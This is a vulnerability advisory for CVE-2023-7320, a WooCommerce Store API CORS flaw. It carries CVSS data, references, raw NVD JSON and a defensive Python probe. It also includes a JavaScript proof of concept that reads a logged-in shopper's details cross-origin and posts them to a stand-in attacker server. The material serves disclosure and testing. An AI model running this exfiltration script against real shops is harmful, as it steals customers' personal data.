Security Vulnerability Report

CVE-2023-7320

Published: 2025-10-29 07:15:33
Last Modified: 2026-04-15 00:35:42

Description

The WooCommerce plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 7.8.2, due to improper CORS handling on the Store API's REST endpoints allowing direct external access from any origin. This can allow unauthenticated attackers to extract sensitive user information including PII (personally identifiable information). In practice the data is read through a shopper's browser: a page on an attacker-controlled origin issues cross-origin requests to the Store API, and because the vulnerable responses are released to any origin, script on that page can read the JSON the shop returns for that shopper. That is the mechanism the PoC below relies on.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Weakness
CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor)

Configurations (Affected Products)

No CPE configuration data is published for this CVE.

WooCommerce plugin for WordPress <= 7.8.2 (the bound is inclusive, as the description states: 7.8.2 itself is affected, not only versions below it)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2023-7320 PoC - WooCommerce Store API CORS Information Disclosure
// This PoC demonstrates how an attacker can steal user PII from a vulnerable WooCommerce site.
// It runs in the victim's browser: the victim is logged in to the shop and loads an attacker page
// that embeds this script, so the cross-origin fetch() carries the victim's WooCommerce cookies.

const TARGET_SITE = 'https://vulnerable-woocommerce-site.com';

async function exploitCORS() {
  try {
    // Attempt to access WooCommerce Store API endpoints
    const endpoints = [
      '/?rest_route=/wc/store/v1/customers/me',
      '/?rest_route=/wc/store/v1/customers',
      '/wp-json/wc/store/v1/customers/me'
    ];

    for (const endpoint of endpoints) {
      console.log(`[*] Trying endpoint: ${endpoint}`);
      const response = await fetch(TARGET_SITE + endpoint, {
        method: 'GET',
        credentials: 'include', // Include cookies for authenticated requests
        mode: 'cors'            // Enable CORS request
      });

      if (response.ok) {
        const data = await response.json();
        console.log('[+] Success! Extracted data:');
        console.log(JSON.stringify(data, null, 2));

        // Extract PII fields
        const pii = {
          email: data.email,
          first_name: data.first_name,
          last_name: data.last_name,
          billing_address: data.billing,
          shipping_address: data.shipping,
          phone: data.billing?.phone
        };

        // Send stolen data to attacker's server
        await fetch('https://attacker-controlled-server.com/collect', {
          method: 'POST',
          headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify(pii)
        });
        console.log('[+] PII data exfiltrated successfully');
        return pii;
      }
    }
  } catch (error) {
    // A CORS rejection surfaces here as a TypeError from fetch(), not as a response
    console.error('[-] Exploitation failed:', error.message);
  }
  return null;
}

// Execute the exploit
// Note: This PoC requires the victim to be logged into the WooCommerce site
// and visit a page containing this script
exploitCORS();

Two things to check before treating a hit from this script as confirmed. First, the browser only hands the response body to the attacker's page when the server answers with Access-Control-Allow-Origin equal to the attacker's origin together with Access-Control-Allow-Credentials: true; a wildcard * is refused for credentialed requests, and a missing or non-matching Access-Control-Allow-Origin makes fetch() reject, which the catch block above reports as "Exploitation failed". Second, the script's precondition (a logged-in shopper who loads the attacker's page) is user interaction, whereas the published vector scores UI:N, so score the finding against your own deployment rather than copying the base score.
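The check a defender wants before and after patching is whether a Store API route still reflects an arbitrary Origin with credentials. The following Python script is an added example for this advisory; it is not code from WooCommerce, Wordfence or the PoC above. It sends one GET with a chosen Origin header and classifies the response headers the way a browser does before releasing the body to page script. The attacker origin (https://attacker.example), the site https://shop.example and the three sample header sets are constructed for illustration; the default probe path is the Store API cart route, which any other route under test can replace.

```python
"""Classify WordPress REST responses by what a cross-origin page could read.

Added example for the CVE-2023-7320 advisory, not WooCommerce or Wordfence code.
The origins and sample headers below are constructed for illustration.
"""
import sys
import urllib.error
import urllib.request

PROBE_ORIGIN = "https://attacker.example"     # hypothetical attacker-controlled origin
DEFAULT_PATH = "/wp-json/wc/store/v1/cart"    # Store API route used as the probe target


def classify_cors(response_headers, probe_origin):
    """Classify what a page on probe_origin could read from this response.

    Returns one of:
      'exposed-credentialed' - ACAO echoes the origin and ACAC is true, so a
                               cookie-bearing fetch() gets the body (the CVE case)
      'exposed-anonymous'    - ACAO is '*' or the origin but credentials are not
                               allowed; only what an anonymous client sees is readable
      'not-exposed'          - no usable ACAO; fetch() rejects with a TypeError
    """
    headers = {name.lower(): value.strip() for name, value in response_headers.items()}
    acao = headers.get("access-control-allow-origin")
    allow_creds = headers.get("access-control-allow-credentials", "").lower() == "true"

    if acao is None:
        return "not-exposed"
    if acao == probe_origin and allow_creds:
        return "exposed-credentialed"
    # Browsers reject '*' for credentialed requests, so a wildcard never exposes
    # a logged-in user's data, only the anonymous view of the route.
    if acao == "*" or acao == probe_origin:
        return "exposed-anonymous"
    return "not-exposed"


def probe(site, path=DEFAULT_PATH, origin=PROBE_ORIGIN, timeout=10):
    """Live check: GET site+path with an Origin header and classify the reply."""
    request = urllib.request.Request(
        site.rstrip("/") + path,
        headers={"Origin": origin, "Accept": "application/json"},
    )
    try:
        with urllib.request.urlopen(request, timeout=timeout) as response:
            return classify_cors(dict(response.headers.items()), origin)
    except urllib.error.HTTPError as err:
        # A 4xx/5xx reply still carries CORS headers; classify those too.
        return classify_cors(dict(err.headers.items()), origin)


# Constructed sample responses (not captured from a real site).
SAMPLE_REFLECTING = {            # origin reflected with credentials: exploitable
    "Content-Type": "application/json; charset=UTF-8",
    "Access-Control-Allow-Origin": "https://attacker.example",
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin",
}
SAMPLE_WILDCARD = {              # public data readable, session data not
    "Content-Type": "application/json; charset=UTF-8",
    "Access-Control-Allow-Origin": "*",
}
SAMPLE_STRICT = {                # only the shop's own origin is allowed
    "Content-Type": "application/json; charset=UTF-8",
    "Access-Control-Allow-Origin": "https://shop.example",
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin",
}


def classify_samples():
    """Classify the constructed samples; used for the offline self-check."""
    return {
        "reflecting": classify_cors(SAMPLE_REFLECTING, PROBE_ORIGIN),
        "wildcard": classify_cors(SAMPLE_WILDCARD, PROBE_ORIGIN),
        "strict": classify_cors(SAMPLE_STRICT, PROBE_ORIGIN),
    }


if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(probe(sys.argv[1]))     # e.g. python cors_probe.py https://shop.example
    else:
        for name, verdict in classify_samples().items():
            print(f"{name}: {verdict}")
```

Run it with a site URL to probe a live target (only one you are authorised to test), or with no arguments to classify the constructed samples. Only the "exposed-credentialed" verdict corresponds to the PoC above; "exposed-anonymous" means a wildcard or reflected origin without credentials, which leaks nothing a logged-out client could not already fetch.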

References

https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2939652@woocommerce/trunk&old=2933569@woocommerce/trunk&sfp_email=&sfph_mail= (WooCommerce trunk changeset, revision 2933569 to 2939652)
https://wpscan.com/vulnerability/d1cec296-b5df-4cea-8c0d-d03a975cb6af
https://www.wordfence.com/threat-intel/vulnerabilities/id/7b2d1879-c337-41c9-9f47-f9c2fe8e5928?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2023-7320",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-29T07:15:33.493",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The WooCommerce plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 7.8.2, due to improper CORS handling on the Store API's REST endpoints allowing direct external access from any origin. This can allow unauthenticated attackers to extract sensitive user information including PII(Personal Identifiable Information)."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-200"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2939652@woocommerce/trunk&old=2933569@woocommerce/trunk&sfp_email=&sfph_mail=",
        "source": "[email protected]"
      },
      {
        "url": "https://wpscan.com/vulnerability/d1cec296-b5df-4cea-8c0d-d03a975cb6af",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7b2d1879-c337-41c9-9f47-f9c2fe8e5928?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}